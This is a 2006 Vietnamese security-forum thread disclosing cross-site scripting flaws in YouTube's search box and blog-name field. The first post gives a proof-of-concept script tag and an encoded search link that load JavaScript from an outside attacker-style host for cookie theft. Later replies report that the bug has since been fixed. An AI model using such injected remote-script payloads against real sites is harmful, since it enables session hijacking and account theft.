English | Vietnamese
 

banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register   [Login] Loginhttp  | https  ]
 
Forum Index Thông tin new bugs và exploits Youtube.com - XSS & cookie disclosure  XML
  [Question]   Youtube.com - XSS & cookie disclosure 17/06/2006 21:09:56 (+0700) | #1 | 436
[Avatar]
 LeonHart
HVA Friend
Joined: 10/01/2003 11:11:52
Messages: 215
Location: Secret
Offline
[Profile] [PM]
Homepage:
http://www.youtube.com

Affected files:

* Search box input
* Adding a new blog:
- Blog name

XSS Vuln with cookie disclosure via search box:

Data isn't sanatized when using the search box. For PoC input:

<script src=http://www.youfucktard.com/xss.js></script>

PoC link:
+http://www.youtube.com/results?search=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fyoufucktard.com%2Fxss.js%3E%3C%2FSCRIPT%3E&search_type=search_videos&search=Search

Screenshots:
http://www.youfucktard.com/xsp/youtube1.jpg

XSS vuln via blog name input box:
Now, you tube allows you to add a blog to your profile, and one of the places they let you merge a blog is from blogspot.com. I auditing them a few days ago, and since you can use html in your blogs name amongst other things, this is dangerous for bringing it into youtube.

Screenshots:
http://www.youfucktard.com/xsp/youtube1.jpg
http://www.youfucktard.com/xsp/youtube2.jpg
http://www.youfucktard.com/xsp/youtube3.jpg
[Up] [Print Copy]
  [Question]   Re: Youtube.com - XSS & cookie disclosure 29/07/2006 05:21:14 (+0700) | #2 | 10761
[Avatar]
 kekhanhkiet
Member
[Minus]    0    [Plus]
Joined: 15/06/2003 16:53:19
Messages: 42
Location: 40 Yết Kiêu...
Offline
[Profile] [PM] [Yahoo!]
Có lẽ Bro nên chịu khó Tran ra tiếng Việt cho anh em nào kô biết TA còn có cơ hội học hỏi.
[Up] [Print Copy]
  [Question]   Youtube.com - XSS & cookie disclosure 29/07/2006 23:05:05 (+0700) | #3 | 10917
t0ny4n
Member
[Minus]    0    [Plus]
Joined: 03/07/2006 10:47:01
Messages: 40
Offline
[Profile] [PM]
Hix, em test theo link trên sao kô đc, hình như nó fix rùi hay sao đó.
Test cái link XSS kô đc nữa.
[Up] [Print Copy]
  [Question]   Youtube.com - XSS & cookie disclosure 02/08/2006 03:21:05 (+0700) | #4 | 11722
antonie0205
Member
[Minus]    0    [Plus]
Joined: 01/08/2006 15:30:51
Messages: 3
Offline
[Profile] [PM]
fix hết rồi ạ.
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|